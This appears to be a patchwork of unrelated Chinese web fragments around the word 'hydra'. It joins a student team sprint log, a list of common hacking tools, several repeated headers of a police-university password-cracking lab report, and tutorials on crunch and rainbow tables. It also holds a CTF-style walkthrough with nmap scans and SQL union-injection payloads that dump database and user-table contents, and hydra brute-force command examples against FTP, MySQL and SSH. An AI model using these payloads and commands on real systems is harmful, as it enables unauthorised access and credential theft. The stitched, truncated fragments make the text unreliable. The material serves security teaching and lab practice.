hydra

Hail_Hydra2—冲刺日志（8） 这个作业属于哪个课程 2020春-S班(福州大学) 这个作业的要求在那里 团队作业第五次——站立式会议+alpha冲刺 团队名称 Hail Hydra(九头蛇) 这个作业的目标 项目冲刺第八次站立会议记录 作业正文 作业正文 其他参考文献 冲刺日志集合 1. 项目燃尽图 模块 具体说明 前端前台 （1）已完成所有主要静态页面[登录、首页、提问页面、搜索结果页面、问题详情页面、奖励兑换页面、关注问题页面、我的回答页面、我的提问页面、我的消息页面]（2）完成主要的前后台交互[登录校验、各个页面的问题（回复）列表展示、详情页面的问题关注/投诉/回复交互、详情页面回复点赞/点灭/投诉交互、奖励兑换记录保存、用户数据实时更新、30分钟不操作自动登出等]（3）针对功能进行了大致的测试，没有严重的使用问题（4）登录页面、忘记密码页面和修改密码页面的加密处理已完成 前端后台 （1）已完成所有静态页面[介绍主页、用户管理页面、新增用户页面、被举报问题/回复管理页面、积分兑换管理页面、临时板块增添页面]（2）完成举报问题、回复的删除、查找；用户管理的增删查；临时板块的增删查；奖励申请记录的查看，交互部分基本完成（3）导出奖励申请记录功能已完成（4）批量导入用户还未实现，由于第四阶段已经开始，觉得这个功能等答辩结束后补充（5）针对功能进行了大致的测试

郑重声明：本文仅限技术交流，不得用于从事非法活动 在不少电影电视剧中，主角的身边都有这么一位电脑高手：他们分分钟可以黑进反派的网络，攻破安全防线，破解口令密码，拿到重要文件。他们的电脑屏幕上都是一些看不懂的图形和数字，你能看懂的就只有那个进度条，伴随着紧张的BGM，慢慢的向100%靠近······ 上面的场景和套路是不是很眼熟？ 影视作品中的黑客当然有夸张和戏剧化的表现，不过，现实世界中的黑客也有一套他们的工具库，轩辕君梳理了常用的20个工具。有了他们，你也能化身电脑高手，成为那个瞩目的焦点。 以下分系统终端侧和网络侧两个方向，分别介绍10款常用的黑客工具。 - OllyDbg - WinDbg - IDA - APIMonitor - PCHunter - ProcExp - ProcMon - dex2jar - jd-gui - Mimikatz - WireShark - Fiddler - nmap - netcat - Nessus - SQLMap - hydra - shodan - zoomeye - metasploit 系统终端 系统终端侧的工具主要用于程序逆向分析、破解等用途。 OllyDbg 调试工具，简称OD，其名头在圈子里也算得上是顶流了。其黑客风的交互界面，丰富便捷的调试功能成为软件破解爱好者的首选利器。 WinDbg 也是一款调试工具，微软出品

【推荐阅读】微服务还能火多久？>>> 信息搜集 nmap -sP 192.168.146.0/24 #主机发现 nmap -A 192.168.146.147 #扫描端口等信息 22端口过滤，80端口开放，同样的从80端口入手。 不是现成的cms，然后浏览一下发现search的地方有sql注入 #探测 Mary //正确 Mary' //错误 Mary'# //正确 #注入 0' union select 1,2,3,4,5,6# //6列均可控 0' union select 1,2,3,4,5,database()# //数据库staff 0' union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema=database()# //StaffDetails,Users 0' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='Users'# //UserID,Username,Password 0' union select 1,2,3,4,5

中国人民公安大学 Chinese people ’ public security university 网络对抗技术 实验报告 实验三 密码破解技术 学生姓名 林雅璐 年级 15级 区队 4区队 指导教师 高见 信息技术与网络安全 学院 201 6 年 11 月 7 日 实验 任务 总纲 20 1 6 —20 1 7 学年 第 一 学期 一、实验目的 1 ．加深并消化本 课程 授课内容，复习所学过的 互联网搜索技巧 、 方法和技术 ； 2 ．了解并熟悉 常用加密算法、加解密工具、破解工具等互联网资源 ， 对 给定的密文、加密文件、系统密码进行破解 ； 3 ． 达到巩固课程知识和实际应用的目的。 二、实验要求 1 ． 认真阅读每个实验内容，需要截图的题目，需清晰截图并对截图进行标注和说明。 2 ．文档 要求结构清晰 ， 图文 表达 准确，标注规范。 推理 内容客观、合理、逻辑性强。 3 ． 软件工具 可使用john the ripper 或hydra 、 字典生成器 、pwdump7 等 。 4 ．实验结束后，保留电子文档。 三 、实验步骤 1 ．准备 提前做好实验准备，实验前应把详细 了解实验目的、实验 要求 和实验内容 ，熟悉 并 准备 好实验用的软件工具 ，按照实验内容和要求提前 做好实验 内容 的准备 。 2 ．实验环境 描述 实验所使用的硬件和软件环境 （包括

所有内容仅作为个人学习和实验使用，请勿用于非法用途，后果自负！ hydra(海德拉) 密码爆破工具，支持几乎所有协议的在线密码破解，能否破解关键取决于破解字典是否足够强大。 常用参数 -l login,后面接用户名 -L login,后面接用户名的文件 -p password,后面接密码 -P password,后面接密码的文件 -C 后面接内容为(username:password)文件,可以代替-l username -p password -M file list of servers to attack, one entry per line 示例 hydra - l user - P passlist . txt ftp : / / 192.168 .0 .1 hydra - L userlist . txt - p defaultpw imap : / / 192.168 .0 .1 / PLAIN hydra - C defaults . txt - 6 pop3s : / / [ 2001 : db8 : : 1 ] : 143 / TLS : DIGEST - MD5 hydra - l admin - p password ftp : / / [ 192.168 .0 .0 / 24 ] / hydra - L logins . txt - P pws .

参数详解： -m 指定目标列表文件一行一条 -f 破解出来一个密码之后就停止 -R　继续上一次的进程进行破解 -S　使用SSL协议连接 -s　PORT 指定端口，如果非默认端口可以这个参数指定 -l 　LOGIN 指定用户名 -L PASS 指定指定用户名字典(文件)，比较少用，一般使用密码字典 -P FILE 指定的密码字典(文件) -e ns 空密码探测(n)，指定的用户密码探测(s) -C FILE 用户名可以用:分割(username:password)可以代替-l username -p password -o FILE 指定结果输出文件 -t TASKS 指定多线程数量，默认为16个线程 -v/-V 显示详细过程 server 目标IP service 指定要破解的内容(如：telnet ftp pop3 mssql mysql ssh ssh2......) 1、破解mysql密码 hydra.exe -L C:\111.txt -P C:\222.txt 192.168.0.0 mysql 使用-L指定我们需要的用户名文件，-P指定字典 2、破解ftp hydra.exe -l admin -P C:\222.txt -t 5 192.168.0.0 ftp 使用-l指定用户名，-t指定线程数，-P指定密码字典 3、破解ssh hysra.exe -L C:\111

中国人民公安大学 Chinese people ’ public security university 网络对抗技术 实验报告 实验三 密码破解技术 学生姓名 王宇 年级 2015级 区队 15网安二区 指导教师 高见 信息技术与网络安全 学院 201 6 年 11 月 7 日 实验任务总纲 20 1 6 —20 1 7 学年 第 一 学期 一、实验目的 1．加深并消化本课程授课内容，复习所学过的互联网搜索技巧、方法和技术； 2．了解并熟悉常用加密算法、加解密工具、破解工具等互联网资源，对给定的密文、加密文件、系统密码进行破解； 3．达到巩固课程知识和实际应用的目的。 二、实验要求 1．认真阅读每个实验内容，需要截图的题目，需清晰截图并对截图进行标注和说明。 2．文档要求结构清晰，图文表达准确，标注规范。推理内容客观、合理、逻辑性强。 3．软件工具可使用john the ripper或hydra、字典生成器、pwdump7等。 4．实验结束后，保留电子文档。 三 、实验步骤 1．准备 提前做好实验准备，实验前应把详细了解实验目的、实验要求和实验内容，熟悉并准备好实验用的软件工具，按照实验内容和要求提前做好实验内容的准备。 2．实验环境 描述实验所使用的硬件和软件环境（包括各种软件工具）； 开机并启动软件office2003或2007、浏览器、加解密软件。 3．实验过程 1

渗透学习：密码破解 一. 密码字典创建 1 crunch工具 1.1 启动crunch工具 min max:指定密码的最小/最大长度； option：可选项 -o:指定输出字典文件的位置； -b:指定写入文件的最大字节数； -t:设置使用的特殊格式； -f:从文件指定字符集； 1.2 创建密码字典文件 crunch 4 6 0123456789 -o number.txt 4 6:表示密码最短长度为4，最长长度为6； 0123456789：密码的范围是数字； -o:输出文件为number.txt 执行 vim number.txt可查看文件内容 2 rtgen rtgen用于生成彩虹表，彩虹表是一个散列值的集合；rtsort用于对彩虹表进行排序。 2.1 进入rtgen所在目录： 如何显示没有那个文件夹或目录，使用 apt-get install rainbowcrack 安装rtgen： 2.2 使用rtgen生成彩虹表 MD5：使用MD5散列算法； numeric：字符集，numeric表示数字； 5 5：明码文本的长度范围； 0：表索引； 100：彩虹表中链的长度； 200：彩虹表中链的数量； 0：片段索引； 在rainbowcrack目录下可以查看到以参数命名的字典文件: 2.3 使用rtsort对彩虹表进行排序 注意事项： 由于rtsort执行后没有反馈信息

中国人民公安大学 Chinese people ’ public security university 网络对抗技术 实验报告 实验三 密码破解技术 学生姓名 焦凯楠 年级 2015级 区队 15网安二区 指导教师 高见 信息技术与网络安全 学院 201 6 年 11 月 7 日 实验 任务 总纲 20 1 6 —20 1 7 学年 第 一 学期 一、实验目的 1 ．加深并消化本 课程 授课内容，复习所学过的 互联网搜索技巧 、 方法和技术 ； 2 ．了解并熟悉 常用加密算法、加解密工具、破解工具等互联网资源 ， 对 给定的密文、加密文件、系统密码进行破解 ； 3 ． 达到巩固课程知识和实际应用的目的。 二、实验要求 1 ． 认真阅读每个实验内容，需要截图的题目，需清晰截图并对截图进行标注和说明。 2 ．文档 要求结构清晰 ， 图文 表达 准确，标注规范。 推理 内容客观、合理、逻辑性强。 3 ． 软件工具 可使用john the ripper 或hydra 、 字典生成器 、pwdump7 等 。 4 ．实验结束后，保留电子文档。 三 、实验步骤 1 ．准备 提前做好实验准备，实验前应把详细 了解实验目的、实验 要求 和实验内容 ，熟悉 并 准备 好实验用的软件工具 ，按照实验内容和要求提前 做好实验 内容 的准备 。 2 ．实验环境 描述 实验所使用的硬件和软件环境 （包括

实验报告 三 学 号 中国人民公安大学 Chinese people’ public security university 网络对抗技术 实验报告 实验三 密码破解技术 学生姓名 温家俊 年级 15 区队 3 指导教师 高见 信息技术与网络安全学院 2016 年 11 月 7 日 实验任务总纲 2016—2017 学年 第 一 学期 一、实验目的 1 ．加深并消化本课程授课内容，复习所学过的互联网搜索技巧、方法和技术； 2 ．了解并熟悉常用加密算法、加解密工具、破解工具等互联网资源，对给定的密文、加密文件、系统密码进行破解； 3 ．达到巩固课程知识和实际应用的目的。 二、实验要求 1 ．认真阅读每个实验内容，需要截图的题目，需清晰截图并对截图进行标注和说明。 2 ．文档要求结构清晰，图文表达准确，标注规范。推理内容客观、合理、逻辑性强。 3 ．软件工具可使用 john the ripper 或 hydra 、字典生成器、 pwdump7 等。 4 ．实验结束后，保留电子文档。 三、实验步骤 1 ．准备 提前做好实验准备，实验前应把详细了解实验目的、实验要求和实验内容，熟悉并准备好实验用的软件工具，按照实验内容和要求提前做好实验内容的准备。 2 ．实验环境 描述实验所使用的硬件和软件环境（包括各种软件工具）； 开机并启动软件 office2003 或 2007 、浏览器、加解密软件